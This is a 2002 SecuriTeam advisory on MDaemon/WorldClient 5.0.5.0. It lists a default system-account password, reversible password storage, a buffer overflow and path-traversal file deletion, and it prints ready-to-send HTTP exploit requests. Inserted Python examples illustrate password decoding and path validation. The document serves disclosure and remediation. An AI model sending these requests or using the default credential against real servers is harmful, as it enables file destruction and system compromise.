[NT] Multiple Vulnerabilities in MDaemon and WorldClient

From: support@securiteam.com
Date: 05/08/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed,  8 May 2002 08:38:31 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Vulnerabilities in MDaemon and WorldClient
------------------------------------------------------------------------

SUMMARY

WorldClient (http://www.deerfield.com/products/mdaemon/worldclient/),
integrated with MDaemon Pro 5.0, gives users access to their e-mail
accounts, folders, address books, and spell checker from any standard web
browser. Because the mail is reached through a browser, users can read
their e-mail from anywhere on the Internet. Unlike typical e-mail client
applications, WorldClient requires no reconfiguration and leaves no
traces of messages on the Internet terminal, an ideal feature for anyone
who travels. WorldClient also stores all messages on the MDaemon server
rather than on a third-party server, which matters to anyone who uses
e-mail for sensitive or confidential communications. The product has been
found to contain multiple vulnerabilities.

DETAILS

Vulnerable systems:
 * MDaemon or WorldClient version 5.0.5.0

Immune systems:
 * MDaemon or WorldClient version 5.0.6.0

1. Default username with default password
MDaemon has a built-in user called MDaemon which is used by the application
itself. When trying to change any setting of this user, an error pops up:
"The MDaemon account is built in system mail account. It is critical for
system purposes and should not be edited needlessly. Attempting to use the
MDaemon system account as if it were a regular mail account can cause
unpredictable results."

By decoding the password (as described in problem 2), it was easy to
discover that the password for this account is always MServer.

2. Weak encryption of the password file
Passwords are by default stored in a file called userlist.dat in the
MDaemon/App directory, usually C:\MDaemon\App\userlist.dat.

Each password is protected only by a weak, keyless transformation that is
trivial to reverse: every character is shifted by a fixed offset and the
result is base64 encoded.
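To make the weakness concrete, the following added example (not MDaemon's code; the real offset is not given in the advisory, so OFFSET below is an assumed stand-in) implements the described shift-plus-base64 scheme next to a salted PBKDF2 hash, the form a password store should take. The obfuscated form is deterministic and inverts with no secret, while the hashed form can only be verified, never decoded.

```python
import base64
import hashlib
import hmac
import os

OFFSET = 3  # assumed placeholder; the advisory does not publish the real constant
PBKDF2_ROUNDS = 100_000


def obfuscate(password: str, offset: int = OFFSET) -> str:
    """The advisory's scheme: shift each character by a fixed offset, then base64."""
    shifted = bytes((b + offset) % 256 for b in password.encode("latin-1"))
    return base64.b64encode(shifted).decode("ascii")


def deobfuscate(stored: str, offset: int = OFFSET) -> str:
    """The inverse needs no key: anyone who can read the file can recover every password."""
    shifted = base64.b64decode(stored)
    return bytes((b - offset) % 256 for b in shifted).decode("latin-1")


def hash_password(password: str, salt: bytes = b"") -> str:
    """Hardened form: random per-user salt plus an iterated one-way hash."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return "pbkdf2$%s$%s" % (base64.b64encode(salt).decode("ascii"),
                             base64.b64encode(digest).decode("ascii"))


def verify_password(password: str, stored: str) -> bool:
    """Verification recomputes the hash; there is no decode path to expose."""
    _, salt_b64, digest_b64 = stored.split("$")
    salt = base64.b64decode(salt_b64)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(digest, base64.b64decode(digest_b64))


if __name__ == "__main__":
    weak = obfuscate("MServer")
    print("obfuscated:", weak, "-> recovered without a key:", deobfuscate(weak))
    strong = hash_password("MServer")
    print("hashed:", strong, "-> verifies:", verify_password("MServer", strong))
```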

3. Buffer overflow in WorldClient
WorldClient contains a buffer overflow. Arbitrary code executed through
this vulnerability runs as SYSTEM on a Windows 2000 machine.

The overflow occurs when trying to create a folder with a long name by
using the Web interface (WorldClient). In my tests, the EIP is overwritten
at 0x0123FFA8. The folder name has to be about 1000 characters long to
cause the overflow. It is important to note that the client exploiting
this issue has to be authenticated when sending the exploit string.

4. Deletion of any file on the same drive as WorldClient
When composing a new e-mail message, users can attach files, which are
stored in the user's folder. WorldClient checks new filenames for
potentially dangerous sequences such as "../" when creating a file, but it
does not apply this check when deleting attached files. As a result, any
file on the same drive as MDaemon can be deleted, possibly leading to a
Denial of Service.
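As an added, defender-side example for issues 3 and 4 (not WorldClient's own code), the validator below is applied on both the create and the delete path, so the two can never diverge. It assumes a per-user attachment folder (the path is constructed) and a folder-name limit of 64 characters; ntpath is used so Windows path semantics apply wherever the script runs. Note that the advisory's deletion request uses `.\..\`, which a check for the literal "../" would not catch; normalising the path and testing containment covers both separators.

```python
import ntpath

# Constructed example layout; the advisory only names C:\MDaemon\App.
USER_DIR = r"C:\MDaemon\Users\alice\Attachments"
MAX_FOLDER_NAME = 64  # assumed bound for issue 3; the advisory reports ~1000 chars overflowing


def resolve_attachment(user_dir: str, name: str) -> str:
    """Return the absolute path for an attachment name inside user_dir.

    Raises ValueError when the name is empty, absolute, drive-qualified, or
    would escape user_dir after normalisation (handles '..\\' and '../').
    """
    if not name or ntpath.isabs(name) or ntpath.splitdrive(name)[0]:
        raise ValueError("absolute or drive-qualified name rejected: %r" % name)
    base = ntpath.normpath(user_dir)
    candidate = ntpath.normpath(ntpath.join(base, name))  # collapses . and ..
    if ntpath.commonpath([base, candidate]) != base:
        raise ValueError("path escapes attachment folder: %r" % name)
    return candidate


def is_safe_attachment(user_dir: str, name: str) -> bool:
    try:
        resolve_attachment(user_dir, name)
        return True
    except ValueError:
        return False


def validate_folder_name(name: str, max_len: int = MAX_FOLDER_NAME) -> str:
    """Bound the folder name before it reaches any fixed-size buffer (issue 3)."""
    if not name or len(name) > max_len or any(c in name for c in "\\/\0"):
        raise ValueError("invalid folder name")
    return name


def store_attachment(user_dir: str, name: str, writer) -> str:
    return writer(resolve_attachment(user_dir, name))


def delete_attachment(user_dir: str, name: str, remover) -> str:
    # Same check as on creation; this is the path WorldClient left unchecked.
    return remover(resolve_attachment(user_dir, name))


if __name__ == "__main__":
    for n in ("test.txt", r".\..\test.txt", "../test.txt", r"C:\MDaemon\App\userlist.dat"):
        print("%-30r safe=%s" % (n, is_safe_attachment(USER_DIR, n)))
```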

Exploit Examples:
Buffer Overflow Example:
POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3000
Content-Length: 1636
Connection: Keep-Alive
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxxx

OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder=AAAAAAAAAAAAAAA[BUFFER_HERE_1000+chars]&NewFolderParent=&Create=Create&Folder%3AInbox=Inbox&Folder%3ADrafts=Drafts&Folder%3ASent=Sent&Folder%3ATrash=Trash&Folder%3As=s

File Deletion Example:
POST /WorldClient.cgi?Session=xxxx&View=Compose-Attach HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://victom.com:3001/WorldClient.cgi?Session=xxxx&View=Options-Folders
Content-Type: multipart/form-data; boundary=---------------------------7d2851b9074c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3001
Content-Length: 407
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxx

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachment"; filename=""
Content-Type: application/octet-stream

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachments"

.\..\test.txt
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Remove"

Remove
-----------------------------7d2851b9074c--

Fix:
The issues were fixed on May 7 2002. An update can be found at:
 ftp://ftp.altn.com/MDaemon/Release/md506_en.exe - English
 ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe - German

This fixes issues #1, #3 and #4.

To prevent users from decoding the userlist.dat file (issue #2), the vendor
recommends ensuring that the correct NTFS permissions are in place on the
file.

ADDITIONAL INFORMATION

The information has been provided by Obscure (obscure@eyeonsecurity.net).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
